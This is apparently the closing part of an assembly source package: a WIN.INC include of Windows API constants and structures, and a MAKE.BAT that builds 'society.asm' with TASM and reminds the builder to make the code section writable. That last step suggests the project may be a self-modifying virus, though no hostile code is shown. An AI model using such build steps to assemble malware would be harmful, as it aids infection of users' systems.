MINSHORT equ 8000h
|
||
MAXSHORT equ 7fffh
|
||
MINLONG equ 80000000h
|
||
|
||
THREAD_BASE_PRIORITY_LOWRT equ 15 ;// value that gets a thread to LowRealtime-1
|
||
THREAD_BASE_PRIORITY_MAX equ 2 ;// maximum thread base priority boost
|
||
THREAD_BASE_PRIORITY_MIN equ -2 ;// minimum thread base priority boost
|
||
THREAD_BASE_PRIORITY_IDLE equ -15 ;// value that gets a thread to idle
|
||
THREAD_PRIORITY_LOWEST equ THREAD_BASE_PRIORITY_MIN
|
||
THREAD_PRIORITY_BELOW_NORMAL equ (THREAD_PRIORITY_LOWEST+1)
|
||
THREAD_PRIORITY_NORMAL equ 0
|
||
THREAD_PRIORITY_HIGHEST equ THREAD_BASE_PRIORITY_MAX
|
||
THREAD_PRIORITY_ABOVE_NORMAL equ (THREAD_PRIORITY_HIGHEST-1)
|
||
THREAD_PRIORITY_ERROR_RETURN equ (MAXLONG)
|
||
THREAD_PRIORITY_TIME_CRITICAL equ THREAD_BASE_PRIORITY_LOWRT
|
||
THREAD_PRIORITY_IDLE equ THREAD_BASE_PRIORITY_IDLE
|
||
|
||
HKEY_CLASSES_ROOT equ 80000000h
|
||
HKEY_CURRENT_USER equ 80000001h
|
||
HKEY_LOCAL_MACHINE equ 80000002h
|
||
HKEY_USERS equ 80000003h
|
||
HKEY_PERFORMANCE_DATA equ 80000004h
|
||
HKEY_CURRENT_CONFIG equ 80000005h
|
||
HKEY_DYN_DATA equ 80000006h
|
||
|
||
REG_OPTION_RESERVED equ 00000000h
|
||
REG_OPTION_NON_VOLATILE equ 00000000h
|
||
REG_OPTION_VOLATILE equ 00000001h
|
||
REG_OPTION_CREATE_LINK equ 00000002h
|
||
REG_OPTION_BACKUP_RESTORE equ 00000004h
|
||
REG_OPTION_OPEN_LINK equ 00000008h
|
||
REG_LEGAL_OPTION equ REG_OPTION_RESERVED or REG_OPTION_NON_VOLATILE or REG_OPTION_VOLATILE or REG_OPTION_CREATE_LINK or REG_OPTION_BACKUP_RESTORE or REG_OPTION_OPEN_LINK
|
||
REG_CREATED_NEW_KEY equ 00000001h
|
||
REG_OPENED_EXISTING_KEY equ 00000002h
|
||
REG_WHOLE_HIVE_VOLATILE equ 00000001h
|
||
REG_REFRESH_HIVE equ 00000002h
|
||
REG_NO_LAZY_FLUSH equ 00000004h
|
||
REG_NOTIFY_CHANGE_NAME equ 00000001h
|
||
REG_NOTIFY_CHANGE_ATTRIBUTES equ 00000002h
|
||
REG_NOTIFY_CHANGE_LAST_SET equ 00000004h
|
||
REG_NOTIFY_CHANGE_SECURITY equ 00000008h
|
||
REG_LEGAL_CHANGE_FILTER equ REG_NOTIFY_CHANGE_NAME or REG_NOTIFY_CHANGE_ATTRIBUTES or REG_NOTIFY_CHANGE_LAST_SET or REG_NOTIFY_CHANGE_SECURITY
|
||
REG_NONE equ 0
|
||
REG_SZ equ 1
|
||
REG_EXPAND_SZ equ 2
|
||
REG_BINARY equ 3
|
||
REG_DWORD equ 4
|
||
REG_DWORD_LITTLE_ENDIAN equ 4
|
||
REG_DWORD_BIG_ENDIAN equ 5
|
||
REG_LINK equ 6
|
||
REG_MULTI_SZ equ 7
|
||
REG_RESOURCE_LIST equ 8
|
||
REG_FULL_RESOURCE_DESCRIPTOR equ 9
|
||
REG_RESOURCE_RequIREMENTS_LIST equ 10
|
||
|
||
KEY_QUERY_VALUE equ 0001h
|
||
KEY_SET_VALUE equ 0002h
|
||
KEY_CREATE_SUB_KEY equ 0004h
|
||
KEY_ENUMERATE_SUB_KEYS equ 0008h
|
||
KEY_NOTIFY equ 0010h
|
||
KEY_CREATE_LINK equ 0020h
|
||
|
||
KEY_READ equ (STANDARD_RIGHTS_READ or KEY_QUERY_VALUE or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY) and (not SYNCHRONIZE)
|
||
KEY_WRITE equ (STANDARD_RIGHTS_WRITE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY) and (not SYNCHRONIZE)
|
||
KEY_EXECUTE equ (KEY_READ) and (not SYNCHRONIZE)
|
||
KEY_ALL_ACCESS equ (STANDARD_RIGHTS_ALL or KEY_QUERY_VALUE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY or KEY_CREATE_LINK) and (not SYNCHRONIZE)
|
||
SERVICE_KERNEL_DRIVER equ 000000001h
|
||
SERVICE_FILE_SYSTEM_DRIVER equ 000000002h
|
||
SERVICE_ADAPTER equ 000000004h
|
||
SERVICE_RECOGNIZER_DRIVER equ 000000008h
|
||
SERVICE_DRIVER equ SERVICE_KERNEL_DRIVER or SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER
|
||
SERVICE_WIN32_OWN_PROCESS equ 000000010h
|
||
SERVICE_WIN32_SHARE_PROCESS equ 000000020h
|
||
SERVICE_WIN32 equ SERVICE_WIN32_OWN_PROCESS or SERVICE_WIN32_SHARE_PROCESS
|
||
SERVICE_INTERACTIVE_PROCESS equ 000000100h
|
||
SERVICE_TYPE_ALL equ SERVICE_WIN32 or SERVICE_ADAPTER or SERVICE_DRIVER or SERVICE_INTERACTIVE_PROCESS
|
||
SERVICE_BOOT_START equ 0
|
||
SERVICE_SYSTEM_START equ 000000001h
|
||
SERVICE_AUTO_START equ 000000002h
|
||
SERVICE_DEMAND_START equ 000000003h
|
||
SERVICE_DISABLED equ 000000004h
|
||
SERVICE_ERROR_IGNORE equ 0
|
||
SERVICE_ERROR_NORMAL equ 000000001h
|
||
SERVICE_ERROR_SEVERE equ 000000002h
|
||
SERVICE_ERROR_CRITICAL equ 000000003h
|
||
|
||
; ====================================================================
|
||
@wordalign macro Adr,x
|
||
if (($-Adr)/2) NE (($-Adr+1)/2)
|
||
db x
|
||
endif
|
||
endm
|
||
@dwordalign macro Adr,x
|
||
if 4-(($-Adr) mod 4)
|
||
db 4-(($-Adr) mod 4) dup (x)
|
||
endif
|
||
endm
|
||
|
||
f_struc struc ; win32 "searchrec"
|
||
; structure
|
||
ff_attr dd ?
|
||
ff_time_create dd ?,?
|
||
ff_time_lastaccess dd ?,?
|
||
ff_time_lastwrite dd ?,?
|
||
ff_size_hi dd ?
|
||
ff_size dd ?
|
||
dd ?,?
|
||
ff_fullname db 260 dup (?)
|
||
|
||
|
||
ff_shortname db 14 dup (?)
|
||
|
||
ends
|
||
|
||
;GDI strucs
|
||
|
||
WNDCLASSEX struc
|
||
cbSize dd ?
|
||
style dd ?
|
||
lpfnWndProc dd ?
|
||
cbClsExtra dd ?
|
||
cbWndExtra dd ?
|
||
hInstance dd ?
|
||
hIcon dd ?
|
||
hCursor dd ?
|
||
hbrBackground dd ?
|
||
lpszMenuName dd ?
|
||
lpszClassName dd ?
|
||
hIconSm dd ?
|
||
WNDCLASSEX ends
|
||
|
||
MSG struc
|
||
hwnd dd ?
|
||
message dd ?
|
||
wParam dd ?
|
||
lParam dd ?
|
||
time dd ?
|
||
pt dd ?
|
||
MSG ends
|
||
|
||
RECT struc
|
||
left dd ?
|
||
top dd ?
|
||
right dd ?
|
||
bottom dd ?
|
||
RECT ends
|
||
|
||
PAINTSTRUCT struc
|
||
hdc dd ?
|
||
fErase dd ?
|
||
rcPaint RECT<,,,>
|
||
fRestore dd ?
|
||
fIncUpdate dd ?
|
||
rgbReserved db 32 dup(?)
|
||
PAINTSTRUCT ends
|
||
|
||
|
||
|
||
|
||
|
||
|
||
CW_USEDEFAULT equ 80000000h
|
||
SW_SHOWNORMAL equ 1
|
||
COLOR_WINDOW equ 5
|
||
IDI_APPLICATION equ 32512
|
||
WS_OVERLAPPEDWINDOW equ 0CF0000h
|
||
|
||
DT_TOP equ 0
|
||
DT_LEFT equ 0
|
||
DT_CENTER equ 1
|
||
DT_RIGHT equ 2
|
||
DT_VCENTER equ 4
|
||
DT_BOTTOM equ 8
|
||
DT_WORDBREAK equ 10h
|
||
DT_SINGLELINE equ 20h
|
||
DT_EXPANDTABS equ 40h
|
||
DT_TABSTOP equ 80h
|
||
DT_NOCLIP equ 100h
|
||
DT_EXTERNALLEADING equ 200h
|
||
DT_CALCRECT equ 400h
|
||
DT_NOPREFIX equ 800h
|
||
DT_INTERNAL equ 1000h
|
||
|
||
|
||
Pushad_Struc STRUC
|
||
_edi DD ?
|
||
_esi DD ?
|
||
_ebp DD ?
|
||
_esp DD ?
|
||
_ebx DD ?
|
||
_edx DD ?
|
||
_ecx DD ?
|
||
_eax DD ?
|
||
Pushad_Struc ENDS
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
|
||
@echo off
|
||
tasm /m /ml society.asm >nul
|
||
if not exist society.obj goto err
|
||
tlink32 /Tpe /aa /x /c society.obj,,,f:\asm\inc\import32.lib >nul
|
||
del society.obj >nul
|
||
echo Make code section r/w.!
|
||
goto end
|
||
:err
|
||
echo ********* ERROR! *********
|
||
:end
|
||
@echo on
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
|